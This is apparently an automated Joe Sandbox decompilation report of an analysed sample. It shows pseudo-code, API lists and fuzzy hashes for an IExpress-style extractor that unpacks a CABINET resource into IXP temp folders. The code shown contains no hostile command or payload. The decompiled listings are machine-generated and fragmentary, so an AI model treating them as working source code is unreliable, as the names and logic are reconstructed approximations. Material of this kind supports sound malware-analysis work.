                                                                                                                                                                                                        				 *0xc9144 = E000C468F(_t36, 0, 0);
                                                                                                                                                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                        				 *0xc9140 = _t8;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					return _t8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t9 =  *0xc8584; // 0x0
                                                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                        					ShowWindow(GetDlgItem( *0xc8584, 0x841), 5); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t10 = E000C4EFD(0, 0); // executed
                                                                                                                                                                                                        				if(_t10 != 0) {
                                                                                                                                                                                                        					__imp__#20(E000C4CA0, E000C4CC0, E000C4980, E000C4A50, E000C4AD0, E000C4B60, E000C4BC0, 1, 0xc9148, _t33);
                                                                                                                                                                                                        					_t34 = _t10;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						_t29 =  *0xc9148; // 0x0
                                                                                                                                                                                                        						_t24 =  *0xc8584; // 0x0
                                                                                                                                                                                                        						E000C44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#22(_t34, "*MEMCAB", 0xc1140, 0, E000C4CD0, 0, 0xc9140); // executed
                                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__#23(_t34); // executed
                                                                                                                                                                                                        					if(_t10 != 0) {
                                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 =  *0xc8584; // 0x0
                                                                                                                                                                                                        					E000C44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_t12 =  *0xc9140; // 0x0
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						FreeResource(_t12);
                                                                                                                                                                                                        						 *0xc9140 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t37 == 0) {
                                                                                                                                                                                                        						_t47 =  *0xc91d8; // 0x0
                                                                                                                                                                                                        						if(_t47 == 0) {
                                                                                                                                                                                                        							E000C44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(( *0xc8a38 & 0x00000001) == 0 && ( *0xc9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                        						SendMessageA( *0xc8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t37;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}
















                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5060
                                                                                                                                                                                                        0x000c5060
                                                                                                                                                                                                        0x000c5070
                                                                                                                                                                                                        0x000c5075
                                                                                                                                                                                                        0x000c5107
                                                                                                                                                                                                        0x000c5107
                                                                                                                                                                                                        0x000c510e
                                                                                                                                                                                                        0x000c5111
                                                                                                                                                                                                        0x000c5117
                                                                                                                                                                                                        0x000c5117
                                                                                                                                                                                                        0x000c511f
                                                                                                                                                                                                        0x000c5121
                                                                                                                                                                                                        0x000c5127
                                                                                                                                                                                                        0x000c5135
                                                                                                                                                                                                        0x000c5135
                                                                                                                                                                                                        0x000c5127
                                                                                                                                                                                                        0x000c5141
                                                                                                                                                                                                        0x000c5159
                                                                                                                                                                                                        0x000c5159
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c515f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46A0
                                                                                                                                                                                                          • Part of subcall function 000C468F: SizeofResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46A9
                                                                                                                                                                                                          • Part of subcall function 000C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000C46C3
                                                                                                                                                                                                          • Part of subcall function 000C468F: LoadResource.KERNEL32(00000000,00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46CC
                                                                                                                                                                                                          • Part of subcall function 000C468F: LockResource.KERNEL32(00000000,?,000C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46D3
                                                                                                                                                                                                          • Part of subcall function 000C468F: memcpy_s.MSVCRT ref: 000C46E5
                                                                                                                                                                                                          • Part of subcall function 000C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000C46EF
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 000C4FFE
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 000C5006
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 000C500D
                                                                                                                                                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 000C5030
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 000C5037
                                                                                                                                                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 000C504A
                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 000C5051
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 000C5111
                                                                                                                                                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 000C5159
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: e3ed7ce0eb2f9a624a25517a118bf5b7c829d19cf23ffa19177e30c76c483ae3
                                                                                                                                                                                                        • Instruction ID: 02c02aa802a1bebc54a70f4d752aaed69f91d0dd9e7249f63bf8bcb914fd5b8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3ed7ce0eb2f9a624a25517a118bf5b7c829d19cf23ffa19177e30c76c483ae3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8331D3B47807056FF7205B61AC9EF6F36ACF74579AF18402CBE01A61E1DABCDC808665
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 c44b9-c44f8 407 c44fe-c4525 LoadStringA 406->407 408 c4679-c467b 406->408 409 c4527-c452e call c681f 407->409 410 c4562-c4568 407->410 411 c467c-c468c call c6ce0 408->411 420 c453f 409->420 421 c4530-c453d call c67c9 409->421 414 c456b-c4570 410->414 414->414 415 c4572-c457c 414->415 418 c457e-c4580 415->418 419 c45c9-c45cb 415->419 422 c4583-c4588 418->422 424 c45cd-c45cf 419->424 425 c4607-c4617 LocalAlloc 419->425 426 c4544-c4554 MessageBoxA 420->426 421->420 421->426 422->422 429 c458a-c458c 422->429 431 c45d2-c45d7 424->431 427 c461d-c4628 call c1680 425->427 428 c455a-c455d 425->428 426->428 435 c462d-c463d MessageBeep call c681f 427->435 428->411 433 c458f-c4594 429->433 431->431 434 c45d9-c45ed LocalAlloc 431->434 433->433 436 c4596-c45ad LocalAlloc 433->436 434->428 437 c45f3-c4605 call c171e 434->437 444 c464e 435->444 445 c463f-c464c call c67c9 435->445 436->428 439 c45af-c45c7 call c171e 436->439 437->435 439->435 448 c4653-c4677 MessageBoxA LocalFree 444->448 445->444 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E000C44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                        				char _v576;
                                                                                                                                                                                                        				void* _v580;
                                                                                                                                                                                                        				struct HWND__* _v584;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                        				intOrPtr _t55;
                                                                                                                                                                                                        				intOrPtr _t58;
                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                        				int _t64;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                                        				intOrPtr* _t84;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t75 = __edx;
                                                                                                                                                                                                        				_t34 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                        				_v584 = __ecx;
                                                                                                                                                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                        				_t67 = _a4;
                                                                                                                                                                                                        				_t69 = 0xd;
                                                                                                                                                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                        				_v580 = _t37;
                                                                                                                                                                                                        				asm("movsb");
                                                                                                                                                                                                        				if(( *0xc8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        					_t39 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_v576 = 0;
		LoadStringA( *0xc9a3c, _t75,  &_v576, 0x200);
		if(_v576 != 0) {
			_t73 =  &_v576;
			_t16 = _t73 + 1; // 0x1
			_t75 = _t16;
			do {
				_t43 =  *_t73;
				_t73 = _t73 + 1;
			} while (_t43 != 0);
			_t84 = _v580;
			_t74 = _t73 - _t75;
			if(_t84 == 0) {
				if(_t67 == 0) {
					_t27 = _t74 + 1; // 0x2
					_t83 = _t27;
					_t44 = LocalAlloc(0x40, _t83);
					_t80 = _t44;
					if(_t80 == 0) {
						goto L6;
					} else {
						_t75 = _t83;
						_t74 = _t80;
						E000C1680(_t80, _t83,  &_v576);
						goto L23;
					}
				} else {
					_t76 = _t67;
					_t24 = _t76 + 1; // 0x1
					_t85 = _t24;
					do {
						_t55 =  *_t76;
						_t76 = _t76 + 1;
					} while (_t55 != 0);
					_t25 = _t76 - _t85 + 0x64; // 0x65
					_t83 = _t25 + _t74;
					_t44 = LocalAlloc(0x40, _t25 + _t74);
					_t80 = _t44;
					if(_t80 == 0) {
						goto L6;
					} else {
						E000C171E(_t80, _t83,  &_v576, _t67);
						goto L23;
					}
				}
			} else {
				_t77 = _t67;
				_t18 = _t77 + 1; // 0x1
				_t81 = _t18;
				do {
					_t58 =  *_t77;
					_t77 = _t77 + 1;
				} while (_t58 != 0);
				_t75 = _t77 - _t81;
				_t82 = _t84 + 1;
				do {
					_t59 =  *_t84;
					_t84 = _t84 + 1;
				} while (_t59 != 0);
				_t21 = _t74 + 0x64; // 0x65
				_t83 = _t21 + _t84 - _t82 + _t75;
				_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
				_t80 = _t44;
				if(_t80 == 0) {
					goto L6;
				} else {
					_push(_v580);
					E000C171E(_t80, _t83,  &_v576, _t67);
					L23:
					MessageBeep(_a12);
					if(E000C681F(_t67) == 0) {
						L25:
						_t49 = 0x10000;
					} else {
						_t54 = E000C67C9(_t74, _t74);
						_t49 = 0x190000;
						if(_t54 == 0) {
							goto L25;
						}
					}
					_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
					_t83 = _t52;
					LocalFree(_t80);
					_t39 = _t52;
				}
			}
		} else {
			if(E000C681F(_t67) == 0) {
				L4:
				_t64 = 0x10010;
			} else {
				_t66 = E000C67C9(0, 0);
				_t64 = 0x190010;
				if(_t66 == 0) {
					goto L4;
				}
			}
			_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
			L6:
			_t39 = _t44 | 0xffffffff;
		}
	}
	return E000C6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
}
                                                                                                                                                                                                        0x000c4583
                                                                                                                                                                                                        0x000c4583
                                                                                                                                                                                                        0x000c4585
                                                                                                                                                                                                        0x000c4586
                                                                                                                                                                                                        0x000c458a
                                                                                                                                                                                                        0x000c458c
                                                                                                                                                                                                        0x000c458f
                                                                                                                                                                                                        0x000c458f
                                                                                                                                                                                                        0x000c4591
                                                                                                                                                                                                        0x000c4592
                                                                                                                                                                                                        0x000c459b
                                                                                                                                                                                                        0x000c459e
                                                                                                                                                                                                        0x000c45a3
                                                                                                                                                                                                        0x000c45a9
                                                                                                                                                                                                        0x000c45ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c45af
                                                                                                                                                                                                        0x000c45af
                                                                                                                                                                                                        0x000c45bf
                                                                                                                                                                                                        0x000c462d
                                                                                                                                                                                                        0x000c4630
                                                                                                                                                                                                        0x000c463d
                                                                                                                                                                                                        0x000c464e
                                                                                                                                                                                                        0x000c464e
                                                                                                                                                                                                        0x000c463f
                                                                                                                                                                                                        0x000c4640
                                                                                                                                                                                                        0x000c4647
                                                                                                                                                                                                        0x000c464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c464c
                                                                                                                                                                                                        0x000c4666
                                                                                                                                                                                                        0x000c466d
                                                                                                                                                                                                        0x000c466f
                                                                                                                                                                                                        0x000c4675
                                                                                                                                                                                                        0x000c4675
                                                                                                                                                                                                        0x000c45ad
                                                                                                                                                                                                        0x000c4527
                                                                                                                                                                                                        0x000c452e
                                                                                                                                                                                                        0x000c453f
                                                                                                                                                                                                        0x000c453f
                                                                                                                                                                                                        0x000c4530
                                                                                                                                                                                                        0x000c4531
                                                                                                                                                                                                        0x000c4538
                                                                                                                                                                                                        0x000c453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c453d
                                                                                                                                                                                                        0x000c4554
                                                                                                                                                                                                        0x000c455a
                                                                                                                                                                                                        0x000c455a
                                                                                                                                                                                                        0x000c455a
                                                                                                                                                                                                        0x000c4525
                                                                                                                                                                                                        0x000c468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 000C45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 000C45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 000C460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 000C4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 000C4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 000C466F
                                                                                                                                                                                                          • Part of subcall function 000C681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000C686E
                                                                                                                                                                                                          • Part of subcall function 000C681F: GetSystemMetrics.USER32(0000004A), ref: 000C68A7
                                                                                                                                                                                                          • Part of subcall function 000C681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000C68CC
                                                                                                                                                                                                          • Part of subcall function 000C681F: RegQueryValueExA.ADVAPI32(?,000C1140,00000000,?,?,0000000C), ref: 000C68F4
                                                                                                                                                                                                          • Part of subcall function 000C681F: RegCloseKey.ADVAPI32(?), ref: 000C6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: ccafe1b2623e4a950254a9348c6dc2e0a6398f3320cc6a4b55c4343b891d9d9b
                                                                                                                                                                                                        • Instruction ID: a43a112a4f3ff237ebc816ff43edc215e5d5b9f6eaad62d38ac90870b0235b4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccafe1b2623e4a950254a9348c6dc2e0a6398f3320cc6a4b55c4343b891d9d9b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7051D372A00219ABDB219F28CC58FEE7BA9FF46304F144198FD09A7246DB36DE05CB51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E000C53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E000C171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E000C1680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E000C658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E000C6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0xc8a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C171E: _vsnprintf.MSVCRT ref: 000C1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000C5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-957705000
                                                                                                                                                                                                        • Opcode ID: 27509d9ebe047b4ff70032f9b79e1e694af34946b492e0a7dd9b0c20d689e3d8
                                                                                                                                                                                                        • Instruction ID: 542032b2ea5e8600df0b507f700d66b48f1bba00450fad56992732a343c8a768
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27509d9ebe047b4ff70032f9b79e1e694af34946b492e0a7dd9b0c20d689e3d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE11047130060867E3249B269C49FEF366DEBC631AF10012DF646D2191CE78998286A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 c5467-c5484 523 c551c-c5528 call c1680 522->523 524 c548a-c5490 call c53a1 522->524 528 c552d-c5539 call c58c8 523->528 527 c5495-c5497 524->527 529 c549d-c54c0 call c1781 527->529 530 c5581-c5583 527->530 537 c554d-c5552 528->537 538 c553b-c5545 CreateDirectoryA 528->538 543 c550c-c551a call c658a 529->543 544 c54c2-c54d8 GetSystemInfo 529->544 533 c558d-c559d call c6ce0 530->533 541 c5554-c5557 call c597d 537->541 542 c5585-c558b 537->542 539 c5577-c557c call c6285 538->539 540 c5547 538->540 539->530 540->537 551 c555c-c555e 541->551 542->533 543->528 549 c54fe 544->549 550 c54da-c54dd 544->550 552 c5503-c5507 call c658a 549->552 555 c54df-c54e2 550->555 556 c54f7-c54fc 550->556 551->542 559 c5560-c5566 551->559 552->543 557 c54e4-c54e7 555->557 558 c54f0-c54f5 555->558 556->552 557->543 561 c54e9-c54ee 557->561 558->552 559->530 562 c5568-c5575 RemoveDirectoryA 559->562 561->552 562->530
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E000C5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0xc91e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E000C1680(0xc91e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E000C58C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E000C6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E000C597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0xc8a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0xc8a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0xc9124 = E000C6285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xc8a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E000C53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
